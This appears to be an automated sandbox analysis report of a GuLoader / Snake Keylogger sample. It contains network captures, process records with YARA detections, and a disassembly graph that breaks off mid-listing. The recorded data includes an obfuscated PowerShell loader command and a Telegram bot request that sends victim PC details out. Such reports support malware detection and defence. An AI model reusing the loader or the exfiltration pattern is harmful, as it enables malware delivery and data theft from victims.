                                                                                                                                    2024-11-20 09:10:40 UTC1390INData Raw: 28 40 a8 0c a3 46 66 8e f2 1d 51 92 4c 4c c4 49 af ff 7d d2 bc 65 5e 97 89 f4 63 5f 9f ea 10 17 ec 84 aa e9 a3 a9 9b b0 3a b3 38 e8 3d 94 93 06 60 84 b2 a0 f4 d7 c3 78 7a 40 a4 3c 1c 19 19 dd 87 1f c3 72 75 25 81 93 1b 3d 4b 1b 9b b3 41 51 0a e0 d2 49 74 26 02 bc 54 5b 43 f0 4d 53 f3 d4 eb ce 1f c0 95 50 49 1f 8b ad 69 c2 ec af 8f 72 00 35 a7 f8 0c 9b 14 48 3e 34 4a 12 1a 61 71 a7 16 34 09 85 ce 25 cf e6 8a fb f7 de 3e 42 61 9a 45 da 8b c9 b1 c6 ed 12 94 c2 7f cf d9 30 b0 ad fc d2 66 0f b6 bd c0 7c c6 fb 8f 1c 63 71 76 ef 45 ab e2 e8 54 07 22 17 49 94 7e d1 3e dc 4e b5 14 cd 46 71 f8 38 1f b8 54 86 e5 16 03 71 d4 bb b5 b1 bb 50 14 b1 a1 ed c5 a3 15 c2 f8 97 48 59 f8 98 f4 8e 9c 49 2b 85 6c cf c2 17 69 6e f2 82 a1 c3 1d 09 38 05 77 9e a4 16 9d a9 84 bc 34
                                                                                                                                    Data Ascii: (@FfQLLI}e^c_:8=`xz@<ru%=KAQIt&T[CMSPIir5H>4Jaq4%>BaE0f|cqvET"I~>NFq8TqPHYI+lin8w4


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    2192.168.2.749974188.114.96.34432500C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    2024-11-20 09:10:44 UTC84OUTGET /xml/8.46.123.75 HTTP/1.1
                                                                                                                                    Host: reallyfreegeoip.org
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    2024-11-20 09:10:44 UTC848INHTTP/1.1 200 OK
                                                                                                                                    Date: Wed, 20 Nov 2024 09:10:44 GMT
                                                                                                                                    Content-Type: text/xml
                                                                                                                                    Content-Length: 361
                                                                                                                                    Connection: close
                                                                                                                                    Cache-Control: max-age=31536000
                                                                                                                                    CF-Cache-Status: HIT
                                                                                                                                    Age: 57753
                                                                                                                                    Last-Modified: Tue, 19 Nov 2024 17:08:11 GMT
                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jH0mWEEqOmWt3zeccIuXJ9hZI5pXA3TliXPFhKKMlvcf2KdDe98ILF%2BgrcZTxGd8R1k1PSVF95Ey%2BJiSYH7l4BmYJPR5yEDyUX4Ko74FVqdEsQTY5fxAOrWZYehxqrazLX7gVoGP"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 8e574f00ab8ac344-EWR
                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1663&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2848&recv_bytes=698&delivery_rate=1703617&cwnd=215&unsent_bytes=0&cid=c503cdd45a5a1269&ts=151&x=0"
                                                                                                                                    2024-11-20 09:10:44 UTC361INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f 6e
                                                                                                                                    Data Ascii: <Response><IP>8.46.123.75</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZon


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    3192.168.2.749975188.114.96.34432500C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    2024-11-20 09:10:52 UTC60OUTGET /xml/8.46.123.75 HTTP/1.1
                                                                                                                                    Host: reallyfreegeoip.org
                                                                                                                                    2024-11-20 09:10:52 UTC850INHTTP/1.1 200 OK
                                                                                                                                    Date: Wed, 20 Nov 2024 09:10:52 GMT
                                                                                                                                    Content-Type: text/xml
                                                                                                                                    Content-Length: 361
                                                                                                                                    Connection: close
                                                                                                                                    Cache-Control: max-age=31536000
                                                                                                                                    CF-Cache-Status: HIT
                                                                                                                                    Age: 57761
                                                                                                                                    Last-Modified: Tue, 19 Nov 2024 17:08:11 GMT
                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=trhPMtafxzWnyaDvkCrmkXeNHVxmFjxNsz0fujKDu058Pd0DKJWBs%2BGcPD3XG0cH7NTjeSAJaQwTTT2euwTvPIPatcyHuoXtAm20y2SpkQ%2B9kxdDCy9uT8BXji1sMLbN1ZjJVwO%2B"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 8e574f34381c8c72-EWR
                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1919&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=698&delivery_rate=1489795&cwnd=165&unsent_bytes=0&cid=798f7575caa6eebf&ts=148&x=0"
                                                                                                                                    2024-11-20 09:10:52 UTC361INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f 6e
                                                                                                                                    Data Ascii: <Response><IP>8.46.123.75</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZon


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    4192.168.2.749977188.114.96.34432500C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    2024-11-20 09:10:53 UTC60OUTGET /xml/8.46.123.75 HTTP/1.1
                                                                                                                                    Host: reallyfreegeoip.org
                                                                                                                                    2024-11-20 09:10:54 UTC852INHTTP/1.1 200 OK
                                                                                                                                    Date: Wed, 20 Nov 2024 09:10:53 GMT
                                                                                                                                    Content-Type: text/xml
                                                                                                                                    Content-Length: 361
                                                                                                                                    Connection: close
                                                                                                                                    Cache-Control: max-age=31536000
                                                                                                                                    CF-Cache-Status: HIT
                                                                                                                                    Age: 57762
                                                                                                                                    Last-Modified: Tue, 19 Nov 2024 17:08:11 GMT
                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0uWtC3CzsotjKAcjr4vpyXb7Wo62uSNhscxrgg%2FACRgkW8lUnkQbfwQJcA%2BNg%2FSvFHuIMqs0UH8HWDuWU0y2i1S84Q1cLMDNag6PEQDHXPbq6C8gPxtevgi%2BYl2ELgyiQh8Jc6cG"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 8e574f3b49170cc1-EWR
                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1603&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=698&delivery_rate=1746411&cwnd=214&unsent_bytes=0&cid=4e27b6ef542dff30&ts=161&x=0"
                                                                                                                                    2024-11-20 09:10:54 UTC361INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f 6e
                                                                                                                                    Data Ascii: <Response><IP>8.46.123.75</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZon


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    5192.168.2.749979188.114.96.34432500C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    2024-11-20 09:10:55 UTC60OUTGET /xml/8.46.123.75 HTTP/1.1
                                                                                                                                    Host: reallyfreegeoip.org
                                                                                                                                    2024-11-20 09:10:55 UTC848INHTTP/1.1 200 OK
                                                                                                                                    Date: Wed, 20 Nov 2024 09:10:55 GMT
                                                                                                                                    Content-Type: text/xml
                                                                                                                                    Content-Length: 361
                                                                                                                                    Connection: close
                                                                                                                                    Cache-Control: max-age=31536000
                                                                                                                                    CF-Cache-Status: HIT
                                                                                                                                    Age: 57764
                                                                                                                                    Last-Modified: Tue, 19 Nov 2024 17:08:11 GMT
                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=VayOPmMfZqiSyl1YHC72TjNakb6CXhFSlmXahRUYBNn9rnYaW5FxlNb4r%2BhzlQnKN%2Fp4WWpuwovsNgMIs4Z7Ryc38VSREpNjECNcIBYuocetMe17nd7NRQhzd4wReb5MXFff7QwK"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 8e574f424b7a0f3d-EWR
                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1585&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2850&recv_bytes=698&delivery_rate=1825000&cwnd=140&unsent_bytes=0&cid=92a15ac39de49b43&ts=163&x=0"
                                                                                                                                    2024-11-20 09:10:55 UTC361INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f 6e
                                                                                                                                    Data Ascii: <Response><IP>8.46.123.75</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZon


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    6192.168.2.749982188.114.96.34432500C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    2024-11-20 09:10:59 UTC84OUTGET /xml/8.46.123.75 HTTP/1.1
                                                                                                                                    Host: reallyfreegeoip.org
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    2024-11-20 09:10:59 UTC858INHTTP/1.1 200 OK
                                                                                                                                    Date: Wed, 20 Nov 2024 09:10:59 GMT
                                                                                                                                    Content-Type: text/xml
                                                                                                                                    Content-Length: 361
                                                                                                                                    Connection: close
                                                                                                                                    Cache-Control: max-age=31536000
                                                                                                                                    CF-Cache-Status: HIT
                                                                                                                                    Age: 57768
                                                                                                                                    Last-Modified: Tue, 19 Nov 2024 17:08:11 GMT
                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0gpxeeG%2BIYBICQFAQA3%2FJbyfVn%2FGJRGZ0V9gZhYi5JO6gr%2BkC5Fv9FkoxKebp68nPsIxW0Eh%2FlQhaSE%2FZRRtrI3RDgNf5wN6nUfYKm%2BpemegXPhFszPGMxYJNduuvTf5ODVuFTpn"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 8e574f5f1be4c470-EWR
                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1486&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=698&delivery_rate=1970310&cwnd=228&unsent_bytes=0&cid=fe57b69afd9f9924&ts=149&x=0"
                                                                                                                                    2024-11-20 09:10:59 UTC361INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f 6e
                                                                                                                                    Data Ascii: <Response><IP>8.46.123.75</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZon


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    7192.168.2.749984188.114.96.34432500C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    2024-11-20 09:11:02 UTC60OUTGET /xml/8.46.123.75 HTTP/1.1
                                                                                                                                    Host: reallyfreegeoip.org
                                                                                                                                    2024-11-20 09:11:02 UTC854INHTTP/1.1 200 OK
                                                                                                                                    Date: Wed, 20 Nov 2024 09:11:02 GMT
                                                                                                                                    Content-Type: text/xml
                                                                                                                                    Content-Length: 361
                                                                                                                                    Connection: close
                                                                                                                                    Cache-Control: max-age=31536000
                                                                                                                                    CF-Cache-Status: HIT
                                                                                                                                    Age: 57771
                                                                                                                                    Last-Modified: Tue, 19 Nov 2024 17:08:11 GMT
                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5RXguaH0lK0J%2FbilpJVF99%2FJ%2FTCWiGyaZEGLVl59DTclbq3fPUzpwjs1zpV%2BpSCiIPIE9tVqWXh6LzoAxJd6YYq9VLMJmKmj2wC%2Fux759wFJ2zD4lH2J6hwWqP6iiNZD6JSXIt0E"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 8e574f6efac50ca2-EWR
                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1633&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=698&delivery_rate=1695702&cwnd=152&unsent_bytes=0&cid=c08e6fb8c852bcc5&ts=163&x=0"
                                                                                                                                    2024-11-20 09:11:02 UTC361INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f 6e
                                                                                                                                    Data Ascii: <Response><IP>8.46.123.75</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZon


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    8192.168.2.749985149.154.167.2204432500C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    2024-11-20 09:11:02 UTC349OUTGET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:704672%0D%0ADate%20and%20Time:%2020/11/2024%20/%2016:33:48%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20704672%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1
                                                                                                                                    Host: api.telegram.org
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    2024-11-20 09:11:03 UTC344INHTTP/1.1 404 Not Found
                                                                                                                                    Server: nginx/1.18.0
                                                                                                                                    Date: Wed, 20 Nov 2024 09:11:03 GMT
                                                                                                                                    Content-Type: application/json
                                                                                                                                    Content-Length: 55
                                                                                                                                    Connection: close
                                                                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                    Access-Control-Allow-Origin: *
                                                                                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                                    2024-11-20 09:11:03 UTC55INData Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 34 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 4e 6f 74 20 46 6f 75 6e 64 22 7d
                                                                                                                                    Data Ascii: {"ok":false,"error_code":404,"description":"Not Found"}


                                                                                                                                    Statistics

                                                                                                                                    CPU Usage

                                                                                                                                    Click to jump to process

                                                                                                                                    Memory Usage

                                                                                                                                    Click to jump to process

                                                                                                                                    High Level Behavior Distribution

                                                                                                                                    Click to dive into process behavior distribution

                                                                                                                                    Behavior

                                                                                                                                    Click to jump to process

                                                                                                                                    System Behavior

                                                                                                                                    General

                                                                                                                                    Target ID:0
                                                                                                                                    Start time:04:09:04
                                                                                                                                    Start date:20/11/2024
                                                                                                                                    Path:C:\Users\user\Desktop\#U5ba2#U6237#U9000#U6b3e#U7533#U8bf7#U8868-SUPERLEON NOVIEMBR.exe
                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                    Commandline:"C:\Users\user\Desktop\#U5ba2#U6237#U9000#U6b3e#U7533#U8bf7#U8868-SUPERLEON NOVIEMBR.exe"
                                                                                                                                    Imagebase:0x400000
                                                                                                                                    File size:807'711 bytes
                                                                                                                                    MD5 hash:39550A5532AF152DF27A096508A0D4E2
                                                                                                                                    Has elevated privileges:true
                                                                                                                                    Has administrator privileges:true
                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                    Reputation:low
                                                                                                                                    Has exited:true

                                                                                                                                    General

                                                                                                                                    Target ID:2
                                                                                                                                    Start time:04:09:05
                                                                                                                                    Start date:20/11/2024
                                                                                                                                    Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                    Commandline:"powershell.exe" -windowstyle minimized "$Havegrund=Get-Content -Raw 'C:\Users\user\AppData\Roaming\argoters\Necrotizing\Ukristeligheden\Gtevielsen.Pro';$Enmotoret=$Havegrund.SubString(14070,3);.$Enmotoret($Havegrund)"
                                                                                                                                    Imagebase:0x400000
                                                                                                                                    File size:433'152 bytes
                                                                                                                                    MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                                                    Has elevated privileges:true
                                                                                                                                    Has administrator privileges:true
                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                    Yara matches:
                                                                                                                                    • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000002.00000002.2050571503.000000000962C000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                    Reputation:high
                                                                                                                                    Has exited:true

                                                                                                                                    General

                                                                                                                                    Target ID:3
                                                                                                                                    Start time:04:09:05
                                                                                                                                    Start date:20/11/2024
                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                    Imagebase:0x7ff75da10000
                                                                                                                                    File size:862'208 bytes
                                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                    Has elevated privileges:true
                                                                                                                                    Has administrator privileges:true
                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                    Reputation:high
                                                                                                                                    Has exited:true

                                                                                                                                    General

                                                                                                                                    Target ID:14
                                                                                                                                    Start time:05:47:22
                                                                                                                                    Start date:20/11/2024
                                                                                                                                    Path:C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                    Commandline:"C:\Windows\SysWOW64\msiexec.exe"
                                                                                                                                    Imagebase:0xb90000
                                                                                                                                    File size:59'904 bytes
                                                                                                                                    MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                                                                                                    Has elevated privileges:true
                                                                                                                                    Has administrator privileges:true
                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                    Yara matches:
                                                                                                                                    • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 0000000E.00000002.2542418088.00000000231A1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                    Reputation:high
                                                                                                                                    Has exited:false

                                                                                                                                    Disassembly

                                                                                                                                    Reset < >

                                                                                                                                      Execution Graph

                                                                                                                                      Execution Coverage:20.9%
                                                                                                                                      Dynamic/Decrypted Code Coverage:0%
                                                                                                                                      Signature Coverage:20.7%
                                                                                                                                      Total number of Nodes:1318
                                                                                                                                      Total number of Limit Nodes:26
                                                                                                                                      execution_graph 2881 4015c1 2901 402c41 2881->2901 2885 401631 2887 401663 2885->2887 2888 401636 2885->2888 2890 401423 24 API calls 2887->2890 2917 401423 2888->2917 2899 40165b 2890->2899 2895 40164a SetCurrentDirectoryW 2895->2899 2896 4015d1 2896->2885 2897 4015fa 2896->2897 2898 401617 GetFileAttributesW 2896->2898 2913 405bbc 2896->2913 2921 40588b 2896->2921 2929 40586e CreateDirectoryW 2896->2929 2897->2896 2924 4057f1 CreateDirectoryW 2897->2924 2898->2896 2902 402c4d 2901->2902 2932 4062dc 2902->2932 2905 4015c8 2907 405c3a CharNextW CharNextW 2905->2907 2908 405c57 2907->2908 2911 405c69 2907->2911 2910 405c64 CharNextW 2908->2910 2908->2911 2909 405c8d 2909->2896 2910->2909 2911->2909 2912 405bbc CharNextW 2911->2912 2912->2911 2914 405bc2 2913->2914 2915 405bd8 2914->2915 2916 405bc9 CharNextW 2914->2916 2915->2896 2916->2914 2970 405322 2917->2970 2920 4062ba lstrcpynW 2920->2895 2981 406694 GetModuleHandleA 2921->2981 2925 405842 GetLastError 2924->2925 2926 40583e 2924->2926 2925->2926 2927 405851 SetFileSecurityW 2925->2927 2926->2897 2927->2926 2928 405867 GetLastError 2927->2928 2928->2926 2930 405882 GetLastError 2929->2930 2931 40587e 2929->2931 2930->2931 2931->2896 2945 4062e9 2932->2945 2933 406534 2934 402c6e 2933->2934 2965 4062ba lstrcpynW 2933->2965 2934->2905 2949 40654e 2934->2949 2936 406502 lstrlenW 2936->2945 2939 4062dc 10 API calls 2939->2936 2940 406417 GetSystemDirectoryW 2940->2945 2942 40642a GetWindowsDirectoryW 2942->2945 2943 40654e 5 API calls 2943->2945 2944 4064a5 lstrcatW 2944->2945 2945->2933 2945->2936 2945->2939 2945->2940 2945->2942 2945->2943 2945->2944 2946 40645e SHGetSpecialFolderLocation 2945->2946 2947 4062dc 10 API calls 2945->2947 2958 406188 2945->2958 2963 406201 wsprintfW 2945->2963 2964 4062ba lstrcpynW 2945->2964 2946->2945 2948 406476 SHGetPathFromIDListW CoTaskMemFree 2946->2948 2947->2945 2948->2945 2952 40655b 2949->2952 2950 4065d1 2951 4065d6 CharPrevW 2950->2951 2955 